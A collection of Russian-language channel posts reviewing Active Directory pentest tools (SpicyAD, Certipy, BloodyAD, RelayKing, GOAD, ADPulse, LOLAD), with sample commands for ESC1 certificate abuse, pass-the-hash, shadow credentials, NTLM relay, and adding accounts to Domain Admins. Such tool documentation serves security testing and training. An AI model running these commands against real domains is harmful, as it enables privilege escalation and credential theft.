🌶 SpicyAD

Инструмент для тестирования на проникновение в среде Active Directory, написанный на языке C# и предназначенный для проведения оценки безопасности. Он объединяет несколько методов атак на AD в простом в использовании в инструменте с интерактивным интерфейсом командной строки.

SpicyAD автоматически определяет и использует LDAPS (порт 636), если он доступен, и LDAP (порт 389), если нет.

🟧Возможности
Содержит в себе 5 различных категорий атак:
🟧Перечисление - получение информации о домене, пользователях, компьютерах, отношениях в домене, делегаций, LAPS, шаблонов сертификатов;
🟧Атаки Kerberos - Kerberoasting (RC4/AES), AS-REP Roasting, Password Spray, Pass-the-Ticket, Targeted Kerberoasting;
🟧Атаки на ADCS - ESC1, ESC4, PKINIT + UnPAC-the-hash;
🟧Атаки на получение учетных данных - Shadow Credentials, RBCD;
🟧Управление AD - добавление/удаление пользователей, узлов, изменение паролей и т.д.

Флаги, используемые для подключения к домену:
🟧/domain:<fqdn> - FQDN целевого домена;
🟧/dc-ip:<ip> - IP-адрес контроллера домена;
🟧/user:<user> - логин для аутентификации в домене;
🟧/password:<pwd> - пароль для аутентификации в домене;
🟧/dns:<ip> (опциональный параметр) - IP-адрес DNS-сервера.

Примеры использования🟧
Сбор данных через bloodhound.

.\SpicyAD.exe bloodhound /collection:all
#or
.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd bloodhound /collection:all

Поиск уязвимостей в шаблонах сертификатов (ESC1-4, ESC8).

.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd enum-vulns

Проведение ESC1-атаки.

.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:lowpriv /password:P@ssw0rd esc1 /template:VulnTemplate /target:administrator /sid

Добавление новой машины в домен.

.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd add-machine /name:YOURPC$ /mac-pass:P@ssw0rd123

#AD #tools #pentest #ESC

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Certipy: Инструмент для аудита и эксплуатации служб сертификации Active Directory

Certipy — инструмент для перечисления, анализа и эксплуатации уязвимостей служб сертификации Active Directory (AD CS). Разработан для профессионального тестирования на проникновение и защиты инфраструктур, поддерживает полный спектр известных атак (ESC1–ESC16) и предоставляет возможности для обнаружения, запроса, подделки сертификатов и ретрансляции аутентификации.

🎇Certipy предназначен как для наступательных, так и для защитных задач, связанных с Active Directory Certificate Services. Инструмент обеспечивает комплексный подход к оценке безопасности PKI-инфраструктуры Windows. Функции:
▶️поиск центров сертификации (CA) и шаблонов сертификатов
▶️автоматическое выявление misconfigurations (ESC1–ESC16)
▶️создание сертификатов с заданными атрибутами
▶️использование сертификатов для получения доступа
▶️перехват и перенаправление NTLM-аутентификации на HTTP(S)/RPC-эндпоинты AD CS

⬇️Установка

pipx install certipy-ad

Проверка

certipy-ad -h

⏺️Перечисление AD CS (find)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10

⏺️Сохранение результатов (флаг -output)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -output results

⏺️Поиск уязвимостей (флаг -vulnerable)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -vulnerable

⏺️Запрос сертификата (req)

certipy-ad req -u user@domain.local -p 'Password123!' -ca 'CA-SERVER' -template 'User'

⏺️Аутентификация по сертификату (auth)

certipy-ad auth -pfx user.pfx -dc-ip 192.168.1.10

⏺️Управление сертификатами (cert)

certipy-ad cert -pfx user.pfx -password 'Password123!' -export

⏺️Shadow Credentials атака (shadow)

certipy-ad shadow -u user@domain.local -p 'Password123!' -target 'computer$' -dc-ip 192.168.1.10

⏺️Ретрансляция NTLM (relay)

certipy-ad relay -ca 192.168.1.10 -template 'DomainController'

⏺️Справка по конкретной команде

certipy-ad find -h

👉Ограничения
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)

#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

BloodyAD: Фреймворк для повышения привилегий в Active Directory

BloodyAD — инструмент, выполняющий специализированные LDAP-запросы к контроллеру домена. Поддерживает аутентификацию с использованием паролей в открытом виде, Pass-the-Hash, Pass-the-Ticket и сертификатов, обеспечивая гибкие возможности для тестирования безопасности AD-инфраструктур.

👉BloodyAD предоставляет возможность выполнять привилегированные операции через LDAP-протокол. Инструмент отличается следующими характеристиками:
▶️множество методов аутентификации (NTLM (пароль/хеш), Kerberos, сертификаты (Schannel, PKINIT))
▶️прозрачная работа через SOCKS-прокси
▶️поддержка LDAPS и шифрования
▶️интеграция с DNS-функциями Active Directory
▶️гибкая система команд для управления объектами AD

⬇️Установка

pipx install bloodyad

Проверка

bloodyad -h

⏺️Аутентификация с паролем (NTLM)

bloodyAD --host 192.168.1.10 -d bloody.local -u john.doe -p 'Password123!' get object user john.doe

⏺️Pass-the-Hash аутентификация

bloodyAD --host dc01.corp.local -d corp.local -u administrator -p :70016778cb0524c799ac25b439bd6a31 get group "Domain Admins"

⏺️Смена пароля пользователя

bloodyAD --host 172.16.1.15 -d bloody.local -u admin -p 'Admin123!' set password john.doe 'NewP@ssw0rd!'

⏺️Получение информации о пользователе

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get object user administrator --json

⏺️Добавление пользователя в группу

bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add groupmember "Domain Admins" john.doe

⏺️Удаление пользователя из группы

bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' remove groupmember "Domain Admins" john.doe

⏺️Shadow Credentials (атака на основе сертификатов)

#добавление теневых учетных данных для пользователя
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add shadowCredentials john.doe

#получение хеша из теневых учетных данных
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' get shadowCredentials john.doe

⏺️Изменение атрибутов безопасности

#добавление GenericAll права для пользователя на объект
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' set genericall john.doe "CN=AdminSDHolder,CN=System,DC=corp,DC=local"

⏺️Поиск объектов с заданными атрибутами

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(&(objectClass=user)(adminCount=1))"

⏺️Получение всех пользователей с непередаваемыми учетными записями

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(userAccountControl:1.2.840.113556.1.4.803:=8192)"

🎇Ограничения и требования
- Для выполнения привилегированных операций требуются соответствующие права в AD
- Необходим доступ к портам LDAP (389/636) и, при необходимости, к Kerberos (88)
- Поддерживаются современные версии Python 3
- Кроссплатформенный инструмент (Windows, Linux, macOS)

#ActiveDirectory #AD #LDAP #BloodyAD #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

👑 RelayKing

Комплексный инструмент для обнаружения и перечисления возможностей relay-атак, предназначенный для выявления потенциальных relay-векторов в средах Active Directory. Поддерживает гибкие возможности отчётности, обеспечивает широкий охват сценариев атак.

Позволяет передавать в инструмент ntlmrelayx.py подготовленный список целей из обнаруженных relay-уязвимых хостов.

❓Что такое Relay-атаки
Relay-атака — тип атаки «человек-посередине» (MITM), при которой злоумышленник перехватывает процесс аутентификации между клиентом и сервером и пересылает его на другой сервис, чтобы получить к нему доступ от имени жертвы, не зная её пароля.

Общий принцип следующий:
1️⃣Пользователь пытается подключиться к желаемому ресурсу (SMB, HTTP, LDAP и т.д.), при этом Windows автоматически отправляет NTLM authentication.
2️⃣Злоумышленник перехватывает NTLM-аутентификацию.
3️⃣Далее он пересылает этот аутентификационный обмен целевому серверу.
4️⃣Тот сервер считает, что это настоящий пользователь, и отправляет challenge.
5️⃣Злоумышленник пересылает полученный от сервера ответ жертве и она вычисляет challenge-response.
6️⃣Полученный ответ снова отправляется серверу, после чего тот считает злоумышленника аутентифицированным пользователем.

❗️Relay-атаки возможны в протоколах, которые используют NTLM-аутентификацию и не имеют механизма защиты от MITM (signing / channel binding): SMB, LDAP, HTTP, MSSQL, RPC, SMTP, WINRM, IMAP.

⬇️Установка

git clone https://github.com/depthsecurity/RelayKing-Depth.git
cd RelayKing/
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt
python3 relayking.py -h

🎇Использование
⏺️Полный охват сети + вывод отчета о сканировании в виде обычного текста и JSON.

python3 relayking.py -u ‘lowpriv’ -p ‘lowpriv-password’ -d client.domain.local --dc-ip 10.0.0.1 -vv --audit --protocols smb,ldap,ldaps,mssql,http,https --threads 10 -o plaintext,json --output-file relayking-scan --proto-portscan --ntlmv1 --gen-relay-list relaytargets.txt

⏺️Полный аудит, проверка ВСЕХ хостов на наличие Net-NTLMv1 через RemoteRegistry.

python3 relayking.py -u ‘lowpriv’ -p ‘lowpriv-password’ -d client.domain.local --dc-ip 10.0.0.1 -vv --audit --protocols smb,ldap,ldaps,mssql,http,https --threads 10 -o plaintext,json --output-file relayking-scan --proto-portscan --ntlmv1-all --gen-relay-list relaytargets.txt

⏺️Сканирование CIDR диапазона без прохождения аутентификации.

python3 relayking.py --null-auth -vv --protocols smb,ldap 10.0.0.0/24

#tools #AD #Windows #relay

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🪧 Специалистам по тестированию на проникновение, изучив интересную технику или новый для себя инструмент, всегда требуется закрепить пройденный материал и отработать его на практике. Однако не всегда понятно где можно найти готовые решения для создания собственной лаборатории с инфраструктурой на основе Active Directory.

❗️В этой статье узнаем какие архитектуры лабораторных стендов необходимы для практических работ и с помощью какого инструмента можно развернуть лабораторию прямо на своем компьютере всего за несколько команд!

☁️Возможная архитектура лабораторного стенда
1️⃣Минимальная конфигурация
▶️Контроллер домена: Используйте Windows Server 2019/2022 с установленными ролями Active Directory Domain Services (AD DS) и DNS;
▶️Рабочие станции: 1-2 виртуальные машины под управлением Windows 10/11. Эти машины будут присоединены к вашему домену и будут имитировать компьютеры рядовых сотрудников;
▶️Атакующая машина: машина, с которой будут выполнять все дальнейшие действия по пентесту. Рекомендуется использовать дистрибутивы такие как Kali Linux.

2️⃣Расширенная конфигурация
▶️Несколько доменов в одном лесу: конфигурация с родительским и дочерним доменами подходит для изучения атак, связанных с доверительными отношениями внутри одного леса;
▶️Отдельный лес: создание второго, независимого леса и настройка между ними доверительных отношений открывает возможности для практики трастовых атак;
▶️Дополнительные серверные роли: для максимального реализма можно добавить серверы с типичными корпоративными службами (AD CS, файловый сервер, SQL Server);
▶️Разнообразие рабочих станций: увеличьте количество клиентских машин до 3-5 и создайте различные группы пользователей с разными уровнями доступа.

⛓️‍💥 GOAD — инструмент, предоставляющий специалистам уязвимую среду Active Directory, готовую к использованию для отработки стандартных методов атак. Идея этого проекта — создать среду, в которой вы сможете оттачивать свои навыки пентеста, не тратя время на самостоятельную разработку.

👉 GOAD использует Vagrant/Terraform и Ansible для автоматического развертывания целой инфраструктуры с предустановленными уязвимостями.

📐Доступные конфигурации GOAD
📉GOAD: 5 виртуальных машин, 2 леса, 3 домена (полная лаборатория Goad);
📉GOAD-Light: 3 виртуальные машины, 1 лес, 2 домена (более компактная версия для тех, у кого слабый компьютер);
📉MINILAB: 2 виртуальные машины, 1 лес, 1 домен (базовая лаборатория с одним контроллером домена (Windows Server 2019) и одной рабочей станцией (Windows 10));
📉SCCM: 4 виртуальные машины, 1 лес, 1 домен, с установленным Microsoft Configuration Manager;
📉NHA: 5 виртуальных машин и 2 домена;
🖱DRACARYS: 3 виртуальных машины и 1 домен.

Само развертывание лаборатории после установки зависимостей производится в одну команду.

./goad.sh -t install -p vmware -l <lab> -ip <ip_range_to_use>

#tools #GOAD #AD #infrastructure

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

☁️ADPulse

Инструмент с открытым исходным кодом, предназначенный для аудита безопасности Active Directory, который подключается к контроллеру домена и выполняет 35 автоматических проверок безопасности. Дает быструю оценку неправильных конфигураций Active Directory, а также ищет уязвимые места в инфраструктуре.

Вместе со сканером безопасности на странице инструмента также представлен скрипт PowerShell с названием test_environment.ps1, с помощью которого можно настроить собственный уязвимый контроллер домена для проведения тестирования.

Как это работает?
1️⃣Подключение — ADPulse связывается с целевым контроллером домена по протоколу LDAPS (порт 636) с автоматическим переключением на LDAP (порт 389). Попытка аутентификации осуществляется с помощью NTLM и протокола SIMPLE bind.
2️⃣Сканирование — каждая из 35 функций проверки запрашивает данные из AD через LDAP и, в случае определенных проверок, выполняет дополнительные операции: легкие сетевые проверки (SMBv1, подписание, нулевые сессии) обнаруженных хостов, обход файловой системы SYSVOL для определения учетных данных GPP и анализ данных DACL для проверок, связанных с ACL.
3️⃣Оценка — результатам присваивается степень критичности и вычитается определенное количество баллов из общей оценки.

Все операции выполняются только с доступом на чтение. ADPulse не изменяет объекты Active Directory, членство в группах, объекты групповой политики или списки управления доступом.

⬇️Установка

# Клонируем репозиторий
git clone https://github.com/yourorg/adpulse.git
cd adpulse

# (Recommended) Создаем виртуальное окружение
python -m venv venv
source venv/bin/activate        # Linux / macOS
venv\Scripts\activate           # Windows

# Устанавливаем зависимости
pip install -r requirements.txt

Форматы отчетов
➡️Вывод в консоль — вывод в терминале с цветовой кодировкой, позволяющий быстро увидеть критические результаты и ключевые моменты;
➡️JSON — машиночитаемый экспорт для интеграции с системами управления ИБ и событиями безопасности, системами обработки заявок или пользовательскими информационными панелями;
➡️HTML — автономный отчет в темной цветовой гамме со сворачиваемыми разделами, значками уровня критичности, карточками со статистикой, шкалой оценки и списком шаблонов ADCS.

🧿Оценка уровня критичности обнаружений
За каждую обнаруженную мисконфигурацию вычитается определенное количество баллов. Общая оценка начинается со 100 и уменьшается за каждое обнаружение:
📉 80–100 — Низкий — хорошая система безопасности c незначительными проблемами;
📉 60–79 — Средний — существенные недостатки, которые необходимо устранить;
📉 40–59 — Высокий — присутствуют значительные уязвимости;
🖱 0–39 — Критический — серьезные риски, которые требуют немедленного устранения.

Использование
❗️ Для работы с ADPulse требуются действительные учетные данные домена.

1️⃣ Базовое сканирование. Все три формата отчетов по умолчанию создаются в папке Reports/.

python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!'

2️⃣ Сканирование с указанием IP DC, генерацией отчета только в формате HTML в директории /tmp/scans.

python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!' --dc-ip 10.0.0.1 --report html --output-dir /tmp/scans

#tools #AD #pentesting #infrastructure

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

💻 Living Off The Land Active Directory

Exploiting Native AD Techniques for Security

😉 LOLAD

Проект предоставляет обширную коллекцию методов, команд и функций 💻 Active Directory, которые можно использовать для операций по обеспечению безопасности и тренировки Redteam

Некоторые примеры:

# Collect Domain SID
Get-ADDomain | Select-Object SID

# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate

# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName

# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName

# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName

💻 Repo

#lolad #redteam #ad #windows

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером